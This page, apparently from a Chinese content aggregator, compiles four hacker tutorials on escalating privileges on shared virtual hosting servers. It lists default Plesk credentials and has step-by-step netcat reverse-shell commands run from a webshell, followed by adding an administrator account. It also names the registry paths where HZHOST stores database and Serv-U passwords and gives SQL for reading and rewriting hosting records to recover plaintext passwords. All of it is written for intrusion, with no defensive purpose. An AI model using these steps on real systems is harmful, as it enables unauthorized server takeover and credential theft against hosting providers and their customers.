虚拟主机提权简单总结

时间:2023年10月22日

/

来源:a310384

/

编辑:本站小编

收藏本文

下载本文

以下是小编精心整理的虚拟主机提权简单总结,本文共4篇,仅供参考,希望能够帮助到大家。本文原稿由网友“a310384”提供。

篇1:虚拟主机提权简单总结

我们的分享和交流只是为了能让自己进步一点点,能带给基友们一点点帮助,可是在交流的过程中遇见了能提权的shell被人删除的情况,真想不通陌生的基友你为什么要这样自私呢,做个黑产拿几百个shell回去卖,你能富有吗?

第一:了解一些简单的虚拟主机识别

常见的虚拟主机识别:

星外虚拟主机主机D:\\freehost\\zhoudeyang\\web\\Prim@Hosting 一般很难找到可执行目录,可以测试用远程调用cmd,exp来提权

虚拟主机D:\\hosting\\wwwroot\\ vhostroot

分支D:\\Vhost\\WebRoot\\51dancecn\\ vhostrootD:\\vhostroot\\localuser\\

星外分支D:\\vhostroot\\LocalUser\\gdrt\\

新网虚拟主机D:\\virtualhost\\web580651\\www\\  可以找到很多可执行目录,但是目前基本上大部分为windows 系统,提权有难度

华众虚拟主机E:\\wwwroot\\longzhihu\\wwwroot\\  一般有安全模式

星外分支F:\\host\\wz8088\\web\\

万网虚拟主机F:\\usr\\fw04408\\xpinfo\\  支持aspx的话应该能扫到可执行目录

其他的虚拟主机可以使用reg.aspx,getacl.aspx配合来识别

第二:是不是能找到可执行目录

主要asp.php和aspx的,我在这里主要介绍ASPX的:

Reg.aspx从注册表读取目录

Getacl.aspx遍历目录以及文件,获取当前用户可控制的目录或者文件

篇2:关于plesk虚拟主机提权

这款虚拟机在国外比较流行,安全性能也很高,在这里记录下提权方法。

1.mysql的admin(原root)默认密码(setup)没改,通过mysql提权

2.Parallels Plesk Control Panel,在8880端口,默认用户名密码admin:setup

3.有注入点的情况下,db权限下写文件到启动项

篇3:NC反弹CMDSHELL提权总结

Server-U等都不可以用的情况下.  一般都可思考用此方法

不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口…  那么这种方法也失效了….

1:通过shell将上传NC和CMD传到站点目录下(这里一定上传的注意权限,最好是可读写目录下)

web目录都是有写有读的权限,我们直接传NC进去

2:然后本地执行nc -vv -lp 52进行反弹

3:在shell命令下执行

F:\\wwwroot\\img\\nc.exe -e cmd上传路径 IP(外网IP) 52(这里是本机端口)

4:在shell里执行命令后,马上看到本地CMS里已经反弹上去了,执行net user 也是成功.

5:直接添加用户,然后远程去连接!

看到添加成功,也设置为管理组了!接下来直接远程连接就OK!

不少人NC提权没有成功过,因为其中的原因是你没有降低权限,而导致了NC提权失败

失败总结:

1.反弹端口

网上不少文章写 反弹端口445 110 什么的,你当防火墙白痴是不是,我建议看一下端口有没有8080端口,如果没有8080端口的话,要反弹8080

端口,这样被防火墙阻止的概率较小

2.降低运行权限

1.现在本地监听一个端口

nc -vv -l -p 8080 //最好是80或8080这样的端口,被防火墙拦截的几率很小,

NC反弹CMDSHELL提权总结

2.在WebShell运行下面命令连接我们监听的端口得到CmdShell:

nc -vv IP 8080 -e C:\\Documents and Settings\\All Users\\Documents\\cmd.exe //假设cmd.exe是上传在“C:\\Documents and Settings\\All

Users\\Documents\\”这个目录

篇4:HZHOST虚拟主机在提权中的进一步利用网站安全

1,c:\\windows\\temp下有hzhost主机留下的ftp登陆记录。有用户名和密码

2。是利用hzhost拿系统主机最高权限的。

安装了hzhost的主机,其mssql sa密码,mysql root密码还有serv-u的administrator密码全部保存在注册表中。位置在

HKEY_LOCAL_MACHINE\\software\\hzhost\\config\\settings\\mysqlpass

HKEY_LOCAL_MACHINE\\software\\hzhost\\config\\settings\\mastersvrpass

经过了hzhost自己的加密方式,象eLVClO4tzsKBf#dee52443a3872cc159

这样的字符串。不过在hzhost后台可以还原!拿到了sa密码,或者root密码,最高权限就在眼前!禁止了w.s的话。大家就传aspx木马导撒!

我们传了一个asp木马上去后。在incs\\constr.asp下面可以看到数据库连接串,

然后连接到数据库。通过执行

SELECT * FROM [hstlst]语句。可以看到很多主机记录

h_ftppass的密码和hzhost主机自己的加密串很相似。没错,主机管理的密码也是经过他自己的加密方式加了密!而我们在主机管理的地方

看到明文密码。说明他又给还原回来了。明白了么?我们先通过aspx木马导出mysql,mssql的root,sa密码加密串后

我们通过这条语句,修改别人的主机密码。

UPDATE [hstlst] SET h_ftppss=’aPWw3j4zMaK83lHMBof9fc298b1d3d0a’ WHERE h_ID=10000471

然后回过头去看主机密码。(这时候被转成了明文)

拿到了root密码为:sphil_070921注意:由于有多种限制。我截的图可能不是很完美。但是此方法绝对可行!

防止替换shift后门进行提权的一些设置WEB安全

个人网站选购虚拟主机的原则和技巧

提水散文

退休工人提的倡议书

幼儿实习简单总结

下载虚拟主机提权简单总结(精选4篇)
虚拟主机提权简单总结.doc
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档
点击下载本文文档